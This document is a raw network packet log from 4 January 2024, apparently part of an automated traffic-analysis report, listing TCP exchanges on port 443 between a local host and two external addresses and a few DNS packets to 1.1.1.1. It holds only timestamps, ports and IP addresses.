Jan 4, 2024 08:49:31.306803942 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.306819916 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.306899071 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.306910992 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.306953907 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.308840990 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.308861017 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.308923006 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.308933020 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.308963060 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.308980942 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.311077118 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.311093092 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.311172009 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.311182022 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.311222076 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.313143969 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.313182116 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.313224077 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.313231945 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.313258886 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.313282013 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.315069914 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.315087080 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.315135002 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.315145016 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.315182924 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.316828966 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.316854954 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.316924095 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.316931963 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.316951990 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.316973925 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.319252014 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.319271088 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.319348097 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.319356918 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.319396019 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.321268082 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.321284056 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.321351051 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.321361065 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.321404934 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.323174000 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.323191881 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.323260069 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.323268890 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.323306084 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.324857950 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.324873924 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.324949980 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.324958086 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.324994087 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.326704979 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.326719999 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.326787949 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.326797009 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.326838970 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.328779936 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.328814983 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.328912973 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.328922987 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.328964949 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.330466032 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.330482960 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.330568075 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.330576897 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.330625057 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.332195997 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.332212925 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.332278967 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.332285881 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.332325935 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.333689928 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.333705902 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.333759069 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.333766937 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.333816051 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.335758924 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.335776091 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.335846901 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.335855007 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.335896015 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.337241888 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.337258101 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.337316990 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.337325096 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.337368011 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.338884115 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.338908911 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.338958979 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.338964939 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.339014053 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.340396881 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.340414047 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.340472937 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.340485096 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.340526104 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.341907978 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.341922998 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.341984034 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.341991901 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.342029095 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.343801975 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.343823910 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.343874931 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.343882084 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.343892097 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.343913078 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.345452070 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.345469952 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.345514059 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.345521927 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.345550060 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.345572948 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.346807003 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.346823931 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.346882105 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.346889973 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.346932888 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.348326921 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.348352909 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.348412037 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.348423004 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.348450899 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.348464012 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.349688053 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.349704027 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.349777937 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.349786043 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.349848986 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.351593018 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.351609945 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.351679087 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.351686954 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.351744890 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.352742910 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.352758884 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.352814913 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.352823019 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.352870941 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.354888916 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.354906082 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.354976892 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.354985952 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.355020046 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.355937958 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.355952978 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.356003046 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.356009960 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.356043100 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.356057882 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.359015942 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.359034061 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.359081984 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.359090090 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.359112978 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.359143019 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.363404036 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.363424063 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.363506079 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.363522053 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.363563061 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.366707087 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.366724014 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.366842985 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.366842985 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.366852999 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.366894960 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.367719889 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.367736101 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.367790937 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.367799997 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.367841005 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.368544102 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.368570089 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.368614912 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.368623972 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.368647099 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.368665934 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.369847059 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.369863033 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.369911909 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.369920015 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.369959116 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.371052027 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.371068001 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.371131897 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.371140957 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.371232986 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.371954918 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.371969938 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.372021914 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.372030020 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.372066975 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.372786045 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.372807026 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.372873068 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.372884989 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.372931004 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.373683929 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.373698950 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.373774052 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.373781919 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.373826027 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.374557018 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.374572992 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.374635935 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.374644995 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.374685049 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.375473976 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.375489950 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.375555038 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.375564098 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.375603914 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.376353979 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.376369953 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.376422882 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.376431942 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.376466036 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.377926111 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.377943039 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.378005981 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.378015995 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.378063917 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.378834009 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.378850937 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.378896952 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.378905058 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.378923893 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.378941059 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.380080938 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.380096912 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.380162001 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.380171061 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.380220890 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.381052971 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.381069899 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.381138086 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.381145000 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.381198883 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.381903887 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.381920099 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.381969929 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.381978035 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.381997108 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.382021904 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.382880926 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.382896900 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.382949114 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.382956982 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.382970095 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.382993937 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.384078979 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.384105921 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.384147882 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.384155035 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.384193897 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.384218931 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.385042906 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.385063887 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.385118008 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.385126114 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.385174036 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.385914087 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.385930061 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.385983944 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.385992050 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.386045933 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.387294054 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.387310028 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.387353897 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.387362003 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.387398958 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.387418032 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.388941050 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.388978958 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.388993025 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.389000893 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.389039993 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.390134096 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.390151024 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.390196085 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.390203953 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.390244007 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.391299009 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.391314983 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.391360998 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.391369104 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.391433954 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.392509937 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.392525911 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.392560005 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.392565966 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.392592907 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.392606020 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.393832922 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.393861055 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.393902063 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.393908978 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.393939018 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.393944979 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:31.393948078 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.393980980 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.394073963 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:31.394093037 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:39.544281960 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:49:39.544328928 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:49:39.544408083 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:49:39.544898987 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:49:39.544909954 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:49:40.095947027 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:49:40.097815037 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:49:40.097835064 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:49:40.099028111 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:49:40.099102974 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:49:40.100667953 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:49:40.100775957 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:49:40.145160913 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:49:40.145169020 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:49:40.192011118 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:49:40.281229973 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:49:40.332633018 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:49:45.043595076 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:49:45.098228931 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:50:04.471699953 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:50:04.520109892 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:50:19.099520922 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:50:19.145085096 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:50:30.594131947 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:50:30.645164967 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:50:42.136694908 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:50:42.191965103 CET	49708	443	192.168.2.6	141.94.96.144
Jan 4, 2024 08:50:53.139933109 CET	443	49708	141.94.96.144	192.168.2.6
Jan 4, 2024 08:50:53.191977978 CET	49708	443	192.168.2.6	141.94.96.144

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2024 08:49:27.724061012 CET	53355	53	192.168.2.6	1.1.1.1
Jan 4, 2024 08:49:28.372150898 CET	53	53355	1.1.1.1	192.168.2.6
Jan 4, 2024 08:49:30.157171011 CET	59886	53	192.168.2.6	1.1.1.1
Jan 4, 2024 08:49:30.252258062 CET	53	59886	1.1.1.1	192.168.2.6

DNS Queries

